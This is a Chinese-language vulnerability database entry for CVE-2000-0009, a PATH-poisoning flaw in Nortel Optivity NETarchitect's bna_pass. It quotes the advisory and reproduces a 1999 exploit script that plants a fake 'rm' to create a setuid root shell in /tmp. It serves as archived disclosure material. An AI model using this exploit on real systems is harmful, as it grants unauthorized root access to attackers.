Optivity NETarchitect中的bna_pass项目使用PATH环境变量找到“rm”项目漏洞

Optivity NETarchitect中的bna_pass项目使用PATH环境变量找到“rm”项目漏洞

漏洞ID 1105666 漏洞类型 其他
发布时间 1999-12-30 更新时间 2005-10-12
图片[1]-Optivity NETarchitect中的bna_pass项目使用PATH环境变量找到“rm”项目漏洞-安全小百科CVE编号 CVE-2000-0009
图片[2]-Optivity NETarchitect中的bna_pass项目使用PATH环境变量找到“rm”项目漏洞-安全小百科CNNVD-ID CNNVD-199912-099
漏洞平台 Multiple CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/19704
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199912-099
|漏洞详情
OptivityNETarchitect中的bna_pass项目使用PATH环境变量找到“rm”项目,使得本地用户执行任意命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/907/info

NETarchitect is an application for simplifying the task of designing and deploying complex switched network system configurations, produced by Nortel Networks and usually shipped with the Optivity Network Configuration System suite of utilities. It is possible to gain root privileges on an HP-UX (possibly Solaris) system running NETarchitect by exploiting a path vulnerability in the binary /opt/bna/bin/bna_pass. bna_pass executes 'rm' assuming that the end user's PATH value is valid and the real rm binary is in the one being called.Because of this, it is possible to have bna_pass execute arbitrary binaries as root if the PATH variable is manipulated. A malicious user can add "." to his PATH environment variable and have binaries searched for and executed in . before any others [directories in PATH]. A false 'rm' would then be executed, compromising the system.

#!/bin/sh
#
# bna.sh - Loneguard 03/03/99
#
# Poision path xploit for Optivity NETarchitect on HPUX
#
cd /tmp
touch /usr/bna/tmp/.loginChk
PATH=.:$PATH;export PATH
cat > rm << _EOF
#!/bin/sh
cp /bin/csh /tmp/kungfu
chmod 4755 /tmp/kungfu
_EOF
chmod 755 /tmp/rm
/opt/bna/bin/bna_pass
|参考资料

来源:BID
名称:907
链接:http://www.securityfocus.com/bid/907

相关推荐: HP VirtualVault Netscape Enterprise Server Vulnerability

HP VirtualVault Netscape Enterprise Server Vulnerability 漏洞ID 1104723 漏洞类型 Boundary Condition Error 发布时间 1999-05-14 更新时间 1999-05-1…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享